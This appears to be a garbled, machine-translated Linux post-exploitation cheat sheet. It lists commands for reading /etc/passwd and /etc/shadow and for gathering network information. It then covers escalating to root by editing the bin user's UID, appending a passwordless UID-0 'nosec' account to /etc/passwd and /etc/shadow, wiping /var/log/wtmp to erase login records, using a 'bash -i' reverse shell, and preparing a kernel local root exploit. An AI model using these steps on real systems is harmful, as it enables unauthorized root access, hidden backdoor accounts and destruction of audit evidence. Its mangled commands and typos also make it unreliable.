CAT/ETC/PASSWD View Linux User Cat/etc/shadow View user password requires root permission
CAT/ETC/PASSWD View Linux Users
Cat/etc/shadow View user password requires root permission
Cat/etc/sysconfig/network-scripts/ifcfg-ethn N represents the network card number to view the IP information of the network card
Ifconfig View native IP information
cat/etc/resolv.conf View DNS Information
Bash-i in a bouncing shell to visually display commands
Bash prompt: When you enter as an ordinary limit user, you usually have a prompt similar to bash$. When you log in as root, your prompt will become
bash#.
System variables: Try the echo "$USER/$EUID" system should tell you what it thinks you are.
Echo 1>/proc/sys/net/ipv4/if_forward is not you write wrong, should be echo 1>/proc/sys/net/ipv4/ip_forward,
Vim/proc/sys/net/ipv4/ip_forward Bar, the default is 0, that is, the kernel does not carry out packet filtering, to 1, let the kernel of the packet filter processing!
Netstat-an grep LISTEN grep:80 View Port
Service--status-all grep running
Service--status-all grep http
View Run Service
Lsb_release-a View System version
Reboot SSH service:/usr/sbin/sshd stop
/usr/sbin/sshd start
Ssd_config file.
Passwordauthentication No,
Change it to
Passwordauthentication Yes
Remote SSH to log on
Otherwise show access denied
Where Usepam yes may be used to establish Pam login, such as SSH from other Linux hosts to the server and, if closed, cannot be opened.
SU's rookie usage
First Chomod 777/etc/passwd
Then modify the bin user's GID and uid to 0
Then passwd set the bin password
Then Cp/bin/bash/sbin/nologin
Then Su Su-bin can go to Rootshell.
The principle is that when SSH does not allow root to log in with the SSH terminal, we do not know the root password, a very rookie practice
I can do that.
Sed-i s/bin:x:1:1/bin:x:0:1/g/etc/passwd
GCC Prtcl2.c–o local–static–wall
echo "Nosec:x:0:0::/:/bin/sh" >>/etc/passwd
echo "nosec::-1:-1:-1:-1:-1:-1:500" >>/etc/shadow
Empty last record cp/dev/null/var/log/wtmp
-----
DD If=/dev/zero of=yourfile bs=10m count=10 establishes a 100m large file to use when using Linux Kernel <= 2.6.17.4 (proc) local Root exploit.